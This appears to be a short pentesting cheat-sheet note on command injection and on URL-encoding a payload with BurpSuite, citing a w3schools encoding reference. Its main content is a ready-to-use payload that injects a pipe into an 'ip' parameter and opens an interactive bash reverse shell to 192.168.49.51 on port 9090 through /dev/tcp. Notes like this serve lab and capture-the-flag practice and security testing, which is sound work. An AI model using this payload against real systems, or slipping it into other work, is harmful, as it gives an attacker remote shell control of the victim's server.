CMD Injection. Encoding payload using urlencode¶
Payload example:
example.com?ip=127.0.0.1|bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'
Using BurpSuite: Convert Selection > URL > URL Encode Key Characters.
References¶
- https://www.w3schools.com/tags/ref_urlencode.ASP ^b0eca3